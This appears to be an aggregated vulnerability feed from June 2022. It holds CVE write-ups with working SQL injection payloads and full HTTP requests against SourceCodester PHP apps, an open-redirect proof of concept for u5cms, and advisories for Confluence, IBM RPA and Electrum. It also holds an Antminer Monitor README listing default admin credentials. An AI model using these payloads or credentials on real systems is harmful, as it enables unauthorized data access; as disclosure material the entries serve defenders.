Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 10 and June 17. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for June 10 to June 17

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via \rdms\admin?page=user\manage_user&id=.

**Rescue Dispatch Management System 1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: \\rdms\\admin?page=user\\manage\_user&id=

Vulnerability location: /cms/rdms/admin/?page=user/manage\_user&id=, id

\[+\] Payload: ip/rdms/admin/?page=user/manage\_user&id=-3%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+

GET /rdms/admin/?page\=user/manage\_user&id\=\-3%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close

CVE-2022-31941: bug_report/SQL-1.md at main · Gsir97/bug_report

Most of the attacks involve the use of automated exploits, security vendor says.

A recently disclosed critical remote code execution (RCE) vulnerability in Atlassian's Confluence Server collaboration platform is now under active attack, in a spate of attacks bent on deploying a variety of malware, including ransomware.  

Researchers from Sophos have observed several attacks over the past two weeks in which attackers used automated exploits against vulnerable Confluence instances running on Windows and Linux servers. In at least two of the Windows-related incidents, adversaries exploited the Atlassian vulnerability to drop Cerber ransomware on the victim networks, the security vendor said in a report Thursday.

Atlassian disclosed the vulnerability in Confluence Server (CVE-2022-26134) over Memorial Day weekend, after researchers from Volexity informed the company about the issue, which they discovered while investigating a breach at a customer location. 

The bug — present in all current versions of Atlassian Confluence Server and Confluence Data Center — basically gives unauthenticated attackers a way to drop a remotely accessible in-memory-only Web shell on systems running a vulnerable version of the collaboration software. In the attack that Volexity investigated, the threat actors then used the Web shell access to drop other malware on the compromised system, which, among other things, gave them persistent backdoor access to it.

The bug stirred some concern because it gave attackers a way to access potentially sensitive project, customer, and other data in Confluence environments. At the time the bug was disclosed, Atlassian did not have a patch for it. However, the company released a fix one a day later, on June 3.

**Ongoing Confluence Attacks**

According to Sophos, while the number of vulnerable Confluence servers has been dwindling since then, attacks continue, making it more important than ever to patch. In most of the attacks that the security vendor observed, threat actors appeared to be using the fileless Web shell to try and spread an existing collection of malware tools more widely. 

The various payloads that Sophos observed include Mirai bot variants, a cryptominer known as z0miner, and pwnkit, a tool for gaining root access on most Linux distributions. Sophos said it also observed attackers exploiting the Atlassian Confluence vulnerability to drop ASP- and PHP-based Web shells on vulnerable systems, likely as a precursor to dropping other malware on them.

Sophos said it also has observed attackers running PowerShell commands and downloading shell code for deploying the post-compromise Cobalt Strike toolkit on Windows servers running a vulnerable version of Confluence. In two incidents, a threat actor tried to deploy Cerber ransomware via the Confluence exploit using an encoded PowerShell command to download and execute the malware. In both incidents, the attackers suggested they had also stolen data from the victims for use as additional leverage for extracting a ransom payment. 

However, there was no evidence that the threat actors had actually exfiltrated any data, Sophos said.

**Double-Extortion Threats**

Double-extortion ransomware attacks like the Cerber incidents have become increasingly common since the Maze ransomware group started the trend back in early 2020. With these attacks, threat actors not only encrypt data, but they also threaten to publicly release the data if their ransom demands are not met.

A recent study of the practice by Rapid7 showed that threat actors trying to coerce victims into paying a ransom most frequently leaked a company’s financial data (63%) first, followed by customer data (48%). However, Rapid7 found variances by industry in the types of data that attackers tend to leak initially. 

For instance, with financial services victims, attackers generally tended to leak customer data first (83% of the time), instead of the victim's internal financial data. However, when it came to organizations in the healthcare and pharmaceutical sectors, ransomware actors leaked the victim's financial data 71% of the time, which was more substantially more frequent than incidents involving leaks of customer data.

Rapid7 also discovered differences among ransomware actors when it comes to the type of data they leaked. For instance, 81% of the incidents involving Conti ransomware featured publicly leaked financial data. The Cl0p group, on the other hand, disclosed employee information (70%) more than any other type of information.

Atlassian Confluence Server Bug Under Active Attack to Distribute Ransomware

An issue was discovered in u5cms verion 8.3.5 There is a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.

URL redirection vulnerability in u5cms v8.3.5

This script is possibly vulnerable to URL redirection attacks.

URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting. By modifying the parameters, the attacker can make the user jump to the phishing web page to realize the attack.

URL redirection vulnerability exists in /loginsave.php. When the user accesses the address constructed by the attacker, the web page will be redirected to the address pointed to by the parameter "u", instead of u5cms' own web page.

The payload is /loginsave.php?u=http://xfs.bxss.me/

When users access this URL, the browser will be redirected to https://www.acunetix.com/vulnerability-scanner/acumonitor-technology

Here are the HTTP request and HTTP response.

HTTP request:

    GET /loginsave.php?u=http://xfs.bxss.me/ HTTP/1.1
    Host: 192.168.116.133
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    

HTTP response:

    HTTP/1.1 302 Moved Temporarily
    Date: Sat, 04 Jun 2022 03:09:40 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.3.29
    X-XSS-Protection: 0
    Set-Cookie: u=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; httponly
    Set-Cookie: p=56e2526ba3e8ff31822f36a269d6434027ba5dcd; path=/; httponly
    Location: [http://xfs.bxss.me?1654312181](http://xfs.bxss.me/?1654312181)
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=latin1
    

Eventually, the browser will be redirected to https://www.acunetix.com/vulnerability-scanner/acumonitor-technology/

If possible, I suggest you check whether the end of the domain name is the current domain name during the development process. If yes, the browser will jump. Otherwise, you should filter out illegal parameters.

Best wishes!

CVE-2022-32444: URL redirection vulnerability in u5cms v8.3.5 · Issue #50 · u5cms/u5cms

IBM Robotic Process Automation 20.10.0, 20.12.5, 21.0.0, 21.0.1, and 21.0.2 contains a vulnerability that could allow a user to obtain sensitive information due to information properly masked in the control center UI. IBM X-Force ID: 227294.

  

**Summary**

IBM Robotic Process Automation is vulnerable to cross tenant disclosure of user ids (CVE-2022-30607)

**Vulnerability Details**

**CVEID:**   CVE-2022-30607  
**DESCRIPTION:**   IBM Robotic Process Automation contains a vulnerability that could allow a user to obtain sensitive information due to information properly masked in the control center UI.  
CVSS Base score: 2.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/227294 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Robotic Process Automation

21.0.2

IBM Robotic Process Automation for Cloud Pak

21.0.2

  

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s)**

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

< 21.0.2.3

Download and apply 21.0.2 IF003 or higher.

IBM Robotic Process Automation for Cloud Pak

< 21.0.2.3

Apply 21.0.2 IF003 or higher.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

30 May 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"}\],"Version":"20.10.0,20.12.5,21.0.0, 21.0.1, 21.0.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-30607: IBM Robotic Process Automation is vulnerable to cross tenant disclosure of user ids (CVE-2022-30607)

paymentrequest.py in Electrum before 4.2.2 allows a file:// URL in the r parameter of a payment request (e.g., within QR code data). On Windows, this can lead to capture of credentials over SMB. On Linux and UNIX, it can lead to a denial of service by specifying the /dev/zero filename.

**Impact**

In BIP70 payment requests, Electrum allows the ?r= field to contain file:// URIs (besides http(s)).  
The ?r= field can contain an arbitrary file URI, chosen by an attacker.

A malicious merchant can provide a BIP70 payment request in the form of a QR code or text, which the victim user would then scan or copy-paste, as part of the payment flow. Electrum would then see the file URI, and try to open the file in read mode and read it. If the read succeeds, the data is parsed using protobuf.

Specifically regarding the QR code vector, note that Electrum starts the BIP70 flow as soon as a QR code is scanned, without giving a chance to the user to review the content of the decoded QR code.

The file URI support was originally added for local dev testing, with the implicit assumption that it is safe to open files on the local filesystem in read-only mode. This assumption is incorrect.

On Linux/macOS, e.g. trying to read /dev/zero results in a DOS attack, where the application would run out-of-memory and get killed.

On Windows, paths can be crafted that correspond to network requests, for example initiating an SMB connection. In particular, it seems that it might be possible for an attacker located in the same "trusted" Local Area Network as the victim, after getting the victim to scan a malicious QR code, to have the victim's computer initiate a same-LAN SMB connection to the attacker's computer, and to capture an authentication token. That authentication token could later be used to initiate an offline brute-force attack against the user's Windows account password.

**Patches**

We have removed the file URI support in commit b247aa5ffef0f9ef000772fcf9cd9c7141abded8.  
Electrum version 4.2.2 contains the fix.

**Credits**

We thank the Unciphered team, and specifically Frank Davidson <fd@unciphered.com> for responsibly disclosing this issue to us.

CVE-2022-31246

A vulnerability in Antminer Monitor 0.50.0 exists because of backdoor or misconfiguration inside a settings file in flask server. Settings file has a predefined secret string, which would be randomly generated, however it is static.

**Antminer Monitor **

Lite Python based Antminer Monitor !!!

*   Add as many miners as you want
*   Supports miners A3, B3, D3, E3, L3, L3+, L3++, R4, S7, S9, S11, S17, S17 Pro, S17+, T9, T9+, T17, V9, X3, Z9 mini, Z11
*   Check their hashrate, temperatures, fan speed, chip condition, HW Error Rate, Uptime
*   Get in-app notifications about miner errors (needs refresh)
*   Log errors to file
*   Display total hashrate grouped by Model
*   Password protected login page

**Screenshot**

**Requirements**

*   Antminer Monitor requires Python 3
*   Mac and Linux users have Python installed by default on their system
*   Windows users can download Python from https://www.python.org ** ATTENTION ** While installing Python be sure to check Add python.exe to Path in the step Customize Python If you don't select this option you will probably face some errors while installing the requirements

**Fresh Installation**

1.  Download the latest official release of #AntminerMonitor from https://github.com/anselal/antminer-monitor/releases or the latest unofficial release from https://github.com/anselal/antminer-monitor/archive/master.zip
    
2.  Unzip the downloaded file in a folder of your preference
    
3.  Open a windows command prompt or a terminal and navigate to the folder where you unzipped the file using the cd command
    
    e.g. If you unzipped the file in the folder C:\Users\foo\Downloads\antminer-monitor-master type the following command and press <Enter>
    
    cd C:\\Users\\foo\\Downloads\\antminer-monitor-master
    
    > Your command prompt or terminal should now look like C:\Users\foo\Downloads\antminer-monitor-master>
    
4.  **This step apply only to _Mac_ users**. If you are a Windows or Linux user continue to step 5.
    
    > Mac users should run all the commands with sudo eg. sudo python get_pip.py
    
    Install pip using ****one**** of the following methods:
    
    4.1 Download get-pip.py from https://bootstrap.pypa.io/get-pip.py and save it inside antminer-monitor-master. Run the following command to install it:
    
    > It will ask for the administrator password. Type it and press <Enter>. While typing your password you won't see the characters on your screen. This is only for security measures.
    
    4.2 Install pip using easy_install. Again it may ask for the administrator password.
    
5.  Install requirements (Mac users don't forget sudo)
    

python -m pip install -r requirements.txt
python manage.py create-db

**Login Page**

1.  Create admin user

python manage.py create-admin

Default creadentials are username: admin - password: antminermonitor. You can change the password from the settings menu.

**Run the app**

(Mac users don't forget sudo)

python manage.py run -h 0.0.0.0 -p 5000

Fire up a browser and point it to http://localhost:5000 if you are running the app on the same machine OR http://<ip>:5000 if you are accesing the app from another machine on the same network, by replacing <ip> with the machine's ip running AntminerMonitor.

Feel free to change the host (-h) and port (-p) parameters as needed by your setup.

You can set the host (-h) and port (-p) parameters in your .flaskenv file to avoid typing them when starting the app.

**Development vs. Production mode**

AntminerMonitor runs by default in development mode, using Flask's development server. In development mode, this server provides an interactive debugger and will reload when code is changed.

To switch to production mode, edit .flaskenv and set FLASK_ENV="production"

**Run AntminerMonitor as a service (systemd)**

Edit antminermonitor.service and adjust it properly to your environment

As root, run the following:

# Copy file service file to systemd's system folder
cp antminermonitor.service /etc/systemd/system/
# reload the daemon to apply changes
systemctl daemon-reload
# That’s it. We can now start the service:
systemctl start antminermonitor
# And automatically get it to start on boot
systemctl enable antminermonitor

**Donations**

*   BTC: 1HYCBovF6mqqKMyG4m2DQxXpdKmogK4Wuw
*   LTC: LLrjq6nRokS74yPMspitHkXv4nLtEyebNW
*   DASH: XuEnZtsCmWcDwKVe82wQddsfwUifXyeRoQ
*   ETH: 0x5bD8813Da5148fbc841bB18b9411fF72EdC8e10a

**Referral**

*   Get a Ledger Nano S and protect your cryptocurrencies

*   Listen to your favorite radio stations and earn BRO cryptocurrency !!!

*   Get paid to search

CVE-2021-40903: GitHub - anselal/antminer-monitor: Cryptocurrency ASIC mining hardware monitor using a simple web interface

Online Ordering System v2.3.2 was discovered to contain a SQL injection vulnerability via /ordering/admin/inventory/index.php?view=edit&id=.

**Online Ordering System By janobe has SQL injection vulnerability**

Author： Wang Chen Jun

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/admin/inventory/index.php?view=edit&id=

Vulnerability location: /ordering/admin/inventory/index.php?view=edit&id= //id is Injection point

\[+\]Payload: /ordering/admin/inventory/index.php?view=edit&id=-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ //id is Injection point

Current database name: multistoredb

GET /ordering/admin/inventory/index.php?view\=edit&id\=\-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-31357: bug_report/SQLi-3.md at main · k0xx11/bug_report

Online Ordering System v2.3.2 was discovered to contain a SQL injection vulnerability via /ordering/admin/store/index.php?view=edit&id=.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System By janobe has SQL injection vulnerability**

Author： Wang Chen Jun

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/admin/store/index.php?view=edit&id=

Vulnerability location: /ordering/admin/store/index.php?view=edit&id= //id is Injection point

\[+\]Payload: /ordering/admin/store/index.php?view=edit&id=-9%27%20union%20select%201,database(),3,4,5,6,7--+ //id is Injection point

Current database name: multistoredb

GET /ordering/admin/store/index.php?view\=edit&id\=\-9%27%20union%20select%201,database(),3,4,5,6,7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-31356: bug_report/SQLi-4.md at main · k0xx11/bug_report

Online Ordering System v2.3.2 was discovered to contain a SQL injection vulnerability via /ordering/index.php?q=category&search=.

Permalink

**Online Ordering System By janobe has SQL injection vulnerability**

Author： Lingtao Wang

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/index.php?q=category&search=

Vulnerability location: /ordering/index.php?q=category&search= //search is Injection point

\[+\]Payload: /ordering/index.php?q=category&search=3%20and%20length(database())%20=12--+ //search is Injection point

Current database name: multistoredb,length is 12

GET /ordering/index.php?q\=category&search\=3%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

When length (database ()) = 11, Content-Length: 18685 

When length (database ()) = 12, Content-Length: 23327

Tag

#windows